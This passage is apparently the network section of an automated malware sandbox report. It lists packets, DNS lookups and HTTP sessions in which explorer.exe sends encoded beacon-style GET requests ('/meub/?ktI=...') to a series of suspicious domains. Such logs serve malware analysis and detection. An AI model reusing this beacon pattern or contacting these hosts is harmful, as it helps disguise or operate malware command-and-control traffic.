                                                                      May 12, 2021 10:51:41.394385099 CEST4972580192.168.2.4107.164.93.172
                                                                      May 12, 2021 10:51:41.585478067 CEST8049725107.164.93.172192.168.2.4
                                                                      May 12, 2021 10:51:41.920188904 CEST4972580192.168.2.4107.164.93.172
                                                                      May 12, 2021 10:51:42.150350094 CEST8049725107.164.93.172192.168.2.4
                                                                      May 12, 2021 10:51:43.344671011 CEST8049725107.164.93.172192.168.2.4
                                                                      May 12, 2021 10:51:43.344873905 CEST4972580192.168.2.4107.164.93.172
                                                                      May 12, 2021 10:51:47.151396990 CEST4972680192.168.2.4104.164.26.246
                                                                      May 12, 2021 10:51:47.346937895 CEST8049726104.164.26.246192.168.2.4
                                                                      May 12, 2021 10:51:47.347071886 CEST4972680192.168.2.4104.164.26.246
                                                                      May 12, 2021 10:51:47.347271919 CEST4972680192.168.2.4104.164.26.246
                                                                      May 12, 2021 10:51:47.739093065 CEST8049726104.164.26.246192.168.2.4
                                                                      May 12, 2021 10:51:47.849630117 CEST4972680192.168.2.4104.164.26.246
                                                                      May 12, 2021 10:51:47.953749895 CEST8049726104.164.26.246192.168.2.4
                                                                      May 12, 2021 10:51:47.953820944 CEST4972680192.168.2.4104.164.26.246
                                                                      May 12, 2021 10:51:48.043176889 CEST8049726104.164.26.246192.168.2.4
                                                                      May 12, 2021 10:51:48.043261051 CEST4972680192.168.2.4104.164.26.246
                                                                      May 12, 2021 10:51:58.117974997 CEST4972780192.168.2.4198.54.117.216
                                                                      May 12, 2021 10:51:58.312294960 CEST8049727198.54.117.216192.168.2.4
                                                                      May 12, 2021 10:51:58.312581062 CEST4972780192.168.2.4198.54.117.216
                                                                      May 12, 2021 10:51:58.312855959 CEST4972780192.168.2.4198.54.117.216
                                                                      May 12, 2021 10:51:58.507247925 CEST8049727198.54.117.216192.168.2.4
                                                                      May 12, 2021 10:51:58.507266998 CEST8049727198.54.117.216192.168.2.4
                                                                      May 12, 2021 10:52:08.960374117 CEST4972880192.168.2.418.219.49.238
                                                                      May 12, 2021 10:52:09.097378016 CEST804972818.219.49.238192.168.2.4
                                                                      May 12, 2021 10:52:09.097668886 CEST4972880192.168.2.418.219.49.238
                                                                      May 12, 2021 10:52:09.098130941 CEST4972880192.168.2.418.219.49.238
                                                                      May 12, 2021 10:52:09.267746925 CEST804972818.219.49.238192.168.2.4
                                                                      May 12, 2021 10:52:09.267822027 CEST804972818.219.49.238192.168.2.4
                                                                      May 12, 2021 10:52:09.268290043 CEST4972880192.168.2.418.219.49.238
                                                                      May 12, 2021 10:52:09.268402100 CEST4972880192.168.2.418.219.49.238
                                                                      May 12, 2021 10:52:09.405317068 CEST804972818.219.49.238192.168.2.4
                                                                      May 12, 2021 10:52:14.497379065 CEST4972980192.168.2.4162.241.62.63
                                                                      May 12, 2021 10:52:14.658348083 CEST8049729162.241.62.63192.168.2.4
                                                                      May 12, 2021 10:52:14.662015915 CEST4972980192.168.2.4162.241.62.63
                                                                      May 12, 2021 10:52:14.662301064 CEST4972980192.168.2.4162.241.62.63
                                                                      May 12, 2021 10:52:14.824084997 CEST8049729162.241.62.63192.168.2.4
                                                                      May 12, 2021 10:52:14.828128099 CEST8049729162.241.62.63192.168.2.4
                                                                      May 12, 2021 10:52:14.828155041 CEST8049729162.241.62.63192.168.2.4
                                                                      May 12, 2021 10:52:14.828591108 CEST4972980192.168.2.4162.241.62.63
                                                                      May 12, 2021 10:52:14.829040051 CEST4972980192.168.2.4162.241.62.63
                                                                      May 12, 2021 10:52:14.991287947 CEST8049729162.241.62.63192.168.2.4
                                                                      May 12, 2021 10:52:19.905034065 CEST4973080192.168.2.434.102.136.180
                                                                      May 12, 2021 10:52:19.946204901 CEST804973034.102.136.180192.168.2.4
                                                                      May 12, 2021 10:52:19.946568966 CEST4973080192.168.2.434.102.136.180
                                                                      May 12, 2021 10:52:19.946628094 CEST4973080192.168.2.434.102.136.180
                                                                      May 12, 2021 10:52:19.987349987 CEST804973034.102.136.180192.168.2.4
                                                                      May 12, 2021 10:52:20.083381891 CEST804973034.102.136.180192.168.2.4
                                                                      May 12, 2021 10:52:20.083417892 CEST804973034.102.136.180192.168.2.4
                                                                      May 12, 2021 10:52:20.083604097 CEST4973080192.168.2.434.102.136.180
                                                                      May 12, 2021 10:52:20.083626986 CEST4973080192.168.2.434.102.136.180
                                                                      May 12, 2021 10:52:20.124206066 CEST804973034.102.136.180192.168.2.4

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      May 12, 2021 10:50:06.187598944 CEST5648353192.168.2.48.8.8.8
                                                                      May 12, 2021 10:50:06.236371040 CEST53564838.8.8.8192.168.2.4
                                                                      May 12, 2021 10:50:07.473145962 CEST5102553192.168.2.48.8.8.8
                                                                      May 12, 2021 10:50:07.522317886 CEST53510258.8.8.8192.168.2.4
                                                                      May 12, 2021 10:50:10.386281967 CEST6151653192.168.2.48.8.8.8
                                                                      May 12, 2021 10:50:10.435064077 CEST53615168.8.8.8192.168.2.4
                                                                      May 12, 2021 10:50:12.766177893 CEST4918253192.168.2.48.8.8.8
                                                                      May 12, 2021 10:50:12.814867020 CEST53491828.8.8.8192.168.2.4
                                                                      May 12, 2021 10:50:13.783512115 CEST5992053192.168.2.48.8.8.8
                                                                      May 12, 2021 10:50:13.832799911 CEST53599208.8.8.8192.168.2.4
                                                                      May 12, 2021 10:50:14.972019911 CEST5745853192.168.2.48.8.8.8
                                                                      May 12, 2021 10:50:15.020659924 CEST53574588.8.8.8192.168.2.4
                                                                      May 12, 2021 10:50:18.660664082 CEST5057953192.168.2.48.8.8.8
                                                                      May 12, 2021 10:50:18.709949017 CEST53505798.8.8.8192.168.2.4
                                                                      May 12, 2021 10:50:20.651276112 CEST5170353192.168.2.48.8.8.8
                                                                      May 12, 2021 10:50:20.700069904 CEST53517038.8.8.8192.168.2.4
                                                                      May 12, 2021 10:50:37.368491888 CEST6524853192.168.2.48.8.8.8
                                                                      May 12, 2021 10:50:37.420420885 CEST53652488.8.8.8192.168.2.4
                                                                      May 12, 2021 10:50:38.520031929 CEST5372353192.168.2.48.8.8.8
                                                                      May 12, 2021 10:50:38.573285103 CEST53537238.8.8.8192.168.2.4
                                                                      May 12, 2021 10:50:39.452804089 CEST6464653192.168.2.48.8.8.8
                                                                      May 12, 2021 10:50:39.504393101 CEST53646468.8.8.8192.168.2.4
                                                                      May 12, 2021 10:50:43.248534918 CEST6529853192.168.2.48.8.8.8
                                                                      May 12, 2021 10:50:43.297564983 CEST53652988.8.8.8192.168.2.4
                                                                      May 12, 2021 10:50:45.461976051 CEST5912353192.168.2.48.8.8.8
                                                                      May 12, 2021 10:50:45.515486956 CEST53591238.8.8.8192.168.2.4
                                                                      May 12, 2021 10:50:46.388328075 CEST5453153192.168.2.48.8.8.8
                                                                      May 12, 2021 10:50:46.436871052 CEST53545318.8.8.8192.168.2.4
                                                                      May 12, 2021 10:50:56.997181892 CEST4971453192.168.2.48.8.8.8
                                                                      May 12, 2021 10:50:57.047228098 CEST53497148.8.8.8192.168.2.4
                                                                      May 12, 2021 10:50:57.931051970 CEST5802853192.168.2.48.8.8.8
                                                                      May 12, 2021 10:50:57.981679916 CEST53580288.8.8.8192.168.2.4
                                                                      May 12, 2021 10:50:59.369159937 CEST5309753192.168.2.48.8.8.8
                                                                      May 12, 2021 10:50:59.417979002 CEST53530978.8.8.8192.168.2.4
                                                                      May 12, 2021 10:51:00.356456041 CEST4925753192.168.2.48.8.8.8
                                                                      May 12, 2021 10:51:00.408096075 CEST53492578.8.8.8192.168.2.4
                                                                      May 12, 2021 10:51:07.619672060 CEST6238953192.168.2.48.8.8.8
                                                                      May 12, 2021 10:51:07.677623987 CEST53623898.8.8.8192.168.2.4
                                                                      May 12, 2021 10:51:12.696763039 CEST4991053192.168.2.48.8.8.8
                                                                      May 12, 2021 10:51:13.572402000 CEST53499108.8.8.8192.168.2.4
                                                                      May 12, 2021 10:51:18.585570097 CEST5585453192.168.2.48.8.8.8
                                                                      May 12, 2021 10:51:18.654793024 CEST53558548.8.8.8192.168.2.4
                                                                      May 12, 2021 10:51:23.881491899 CEST6454953192.168.2.48.8.8.8
                                                                      May 12, 2021 10:51:24.033982992 CEST53645498.8.8.8192.168.2.4
                                                                      May 12, 2021 10:51:29.321614027 CEST6315353192.168.2.48.8.8.8
                                                                      May 12, 2021 10:51:29.383584023 CEST53631538.8.8.8192.168.2.4
                                                                      May 12, 2021 10:51:34.574343920 CEST5299153192.168.2.48.8.8.8
                                                                      May 12, 2021 10:51:34.637315035 CEST53529918.8.8.8192.168.2.4
                                                                      May 12, 2021 10:51:39.858114958 CEST5370053192.168.2.48.8.8.8
                                                                      May 12, 2021 10:51:40.059561968 CEST53537008.8.8.8192.168.2.4
                                                                      May 12, 2021 10:51:46.934683084 CEST5172653192.168.2.48.8.8.8
                                                                      May 12, 2021 10:51:47.149091959 CEST53517268.8.8.8192.168.2.4
                                                                      May 12, 2021 10:51:52.870204926 CEST5679453192.168.2.48.8.8.8
                                                                      May 12, 2021 10:51:53.016850948 CEST53567948.8.8.8192.168.2.4
                                                                      May 12, 2021 10:51:58.051847935 CEST5653453192.168.2.48.8.8.8
                                                                      May 12, 2021 10:51:58.115525007 CEST53565348.8.8.8192.168.2.4
                                                                      May 12, 2021 10:52:08.547878981 CEST5662753192.168.2.48.8.8.8
                                                                      May 12, 2021 10:52:08.957885027 CEST53566278.8.8.8192.168.2.4
                                                                      May 12, 2021 10:52:14.309987068 CEST5662153192.168.2.48.8.8.8
                                                                      May 12, 2021 10:52:14.496155024 CEST53566218.8.8.8192.168.2.4
                                                                      May 12, 2021 10:52:19.838093996 CEST6311653192.168.2.48.8.8.8
                                                                      May 12, 2021 10:52:19.904480934 CEST53631168.8.8.8192.168.2.4

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                      May 12, 2021 10:51:07.619672060 CEST192.168.2.48.8.8.80x590fStandard query (0)www.paperplaneexplorer.comA (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:12.696763039 CEST192.168.2.48.8.8.80xee68Standard query (0)www.xn--80aasvjfhla.xn--p1acfA (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:18.585570097 CEST192.168.2.48.8.8.80xf953Standard query (0)www.comicstattoosnguns.comA (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:23.881491899 CEST192.168.2.48.8.8.80x32baStandard query (0)www.goeseo.comA (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:29.321614027 CEST192.168.2.48.8.8.80x21aeStandard query (0)www.shadyshainarae.comA (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:34.574343920 CEST192.168.2.48.8.8.80x71fbStandard query (0)www.thefrankversion.comA (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:39.858114958 CEST192.168.2.48.8.8.80xd9e3Standard query (0)www.tjanyancha.comA (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:46.934683084 CEST192.168.2.48.8.8.80xbd5fStandard query (0)www.dmowang.comA (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:52.870204926 CEST192.168.2.48.8.8.80xff09Standard query (0)www.usapersonalshopper.comA (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:58.051847935 CEST192.168.2.48.8.8.80x879aStandard query (0)www.pocopage.comA (IP address)IN (0x0001)
                                                                      May 12, 2021 10:52:08.547878981 CEST192.168.2.48.8.8.80xccfbStandard query (0)www.goodcreditcardshome.infoA (IP address)IN (0x0001)
                                                                      May 12, 2021 10:52:14.309987068 CEST192.168.2.48.8.8.80x8eb7Standard query (0)www.pasteleriaruth.comA (IP address)IN (0x0001)
                                                                      May 12, 2021 10:52:19.838093996 CEST192.168.2.48.8.8.80x2f41Standard query (0)www.amesshop.comA (IP address)IN (0x0001)

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                      May 12, 2021 10:51:07.677623987 CEST8.8.8.8192.168.2.40x590fName error (3)www.paperplaneexplorer.comnonenoneA (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:13.572402000 CEST8.8.8.8192.168.2.40xee68Server failure (2)www.xn--80aasvjfhla.xn--p1acfnonenoneA (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:18.654793024 CEST8.8.8.8192.168.2.40xf953No error (0)www.comicstattoosnguns.comcomicstattoosnguns.comCNAME (Canonical name)IN (0x0001)
                                                                      May 12, 2021 10:51:18.654793024 CEST8.8.8.8192.168.2.40xf953No error (0)comicstattoosnguns.com34.102.136.180A (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:24.033982992 CEST8.8.8.8192.168.2.40x32baNo error (0)www.goeseo.com66.96.162.130A (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:29.383584023 CEST8.8.8.8192.168.2.40x21aeNo error (0)www.shadyshainarae.comshadyshainarae.comCNAME (Canonical name)IN (0x0001)
                                                                      May 12, 2021 10:51:29.383584023 CEST8.8.8.8192.168.2.40x21aeNo error (0)shadyshainarae.com34.102.136.180A (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:34.637315035 CEST8.8.8.8192.168.2.40x71fbNo error (0)www.thefrankversion.comthefrankversion.comCNAME (Canonical name)IN (0x0001)
                                                                      May 12, 2021 10:51:34.637315035 CEST8.8.8.8192.168.2.40x71fbNo error (0)thefrankversion.com34.102.136.180A (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:40.059561968 CEST8.8.8.8192.168.2.40xd9e3No error (0)www.tjanyancha.com107.164.93.172A (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:47.149091959 CEST8.8.8.8192.168.2.40xbd5fNo error (0)www.dmowang.com104.164.26.246A (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:53.016850948 CEST8.8.8.8192.168.2.40xff09Name error (3)www.usapersonalshopper.comnonenoneA (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:58.115525007 CEST8.8.8.8192.168.2.40x879aNo error (0)www.pocopage.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                                      May 12, 2021 10:51:58.115525007 CEST8.8.8.8192.168.2.40x879aNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:58.115525007 CEST8.8.8.8192.168.2.40x879aNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:58.115525007 CEST8.8.8.8192.168.2.40x879aNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:58.115525007 CEST8.8.8.8192.168.2.40x879aNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:58.115525007 CEST8.8.8.8192.168.2.40x879aNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:58.115525007 CEST8.8.8.8192.168.2.40x879aNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                                      May 12, 2021 10:51:58.115525007 CEST8.8.8.8192.168.2.40x879aNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                                      May 12, 2021 10:52:08.957885027 CEST8.8.8.8192.168.2.40xccfbNo error (0)www.goodcreditcardshome.info18.219.49.238A (IP address)IN (0x0001)
                                                                      May 12, 2021 10:52:08.957885027 CEST8.8.8.8192.168.2.40xccfbNo error (0)www.goodcreditcardshome.info18.218.104.7A (IP address)IN (0x0001)
                                                                      May 12, 2021 10:52:14.496155024 CEST8.8.8.8192.168.2.40x8eb7No error (0)www.pasteleriaruth.compasteleriaruth.comCNAME (Canonical name)IN (0x0001)
                                                                      May 12, 2021 10:52:14.496155024 CEST8.8.8.8192.168.2.40x8eb7No error (0)pasteleriaruth.com162.241.62.63A (IP address)IN (0x0001)
                                                                      May 12, 2021 10:52:19.904480934 CEST8.8.8.8192.168.2.40x2f41No error (0)www.amesshop.comamesshop.comCNAME (Canonical name)IN (0x0001)
                                                                      May 12, 2021 10:52:19.904480934 CEST8.8.8.8192.168.2.40x2f41No error (0)amesshop.com34.102.136.180A (IP address)IN (0x0001)

                                                                      HTTP Request Dependency Graph

                                                                      • www.comicstattoosnguns.com
                                                                      • www.goeseo.com
                                                                      • www.shadyshainarae.com
                                                                      • www.thefrankversion.com
                                                                      • www.tjanyancha.com
                                                                      • www.dmowang.com
                                                                      • www.pocopage.com
                                                                      • www.goodcreditcardshome.info
                                                                      • www.pasteleriaruth.com
                                                                      • www.amesshop.com

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      0192.168.2.44972134.102.136.18080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      May 12, 2021 10:51:18.705996990 CEST221OUTGET /meub/?6lt4=M6ATVT20FLj&ktI=QUeAVjOekbDfJHkoX1fEShfTueYawgYx/upvqY2KU2Y9ees5c1/xq3BWwCfJvPCdwXre HTTP/1.1
                                                                      Host: www.comicstattoosnguns.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      May 12, 2021 10:51:18.844482899 CEST222INHTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Wed, 12 May 2021 08:51:18 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "609953da-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      1192.168.2.44972266.96.162.13080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      May 12, 2021 10:51:24.162463903 CEST222OUTGET /meub/?ktI=F4zWwb5Q9DmjBwYPj4pXutYCzYEQVONbMin29ERkoE+ZXMdA8ttbKylRMOj5c1Wk3PTt&6lt4=M6ATVT20FLj HTTP/1.1
                                                                      Host: www.goeseo.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      May 12, 2021 10:51:24.313256979 CEST223INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 12 May 2021 08:51:24 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 867
                                                                      Connection: close
                                                                      Server: Apache/2
                                                                      Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                      Accept-Ranges: bytes
                                                                      Accept-Ranges: bytes
                                                                      Age: 0
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      2192.168.2.44972334.102.136.18080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      May 12, 2021 10:51:29.427136898 CEST224OUTGET /meub/?6lt4=M6ATVT20FLj&ktI=IF6wwdQ2GC/v5+zeo737nU5N5nLUvdsVBqkfZ3TmK32/J3TLHA8Ym95CSgcH90A9/Nib HTTP/1.1
                                                                      Host: www.shadyshainarae.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      May 12, 2021 10:51:29.565346956 CEST225INHTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Wed, 12 May 2021 08:51:29 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "60995c49-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      3192.168.2.44972434.102.136.18080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      May 12, 2021 10:51:34.680213928 CEST226OUTGET /meub/?ktI=xRifbL4BvWher3OHgQRKthYl2aDcqb2ql1CEYfUIGij2TzekdjVq3iFcomd6Mb6Rt5kB&6lt4=M6ATVT20FLj HTTP/1.1
                                                                      Host: www.thefrankversion.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      May 12, 2021 10:51:34.817344904 CEST226INHTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Wed, 12 May 2021 08:51:34 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "60995c49-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      4192.168.2.449725107.164.93.17280C:\Windows\explorer.exe
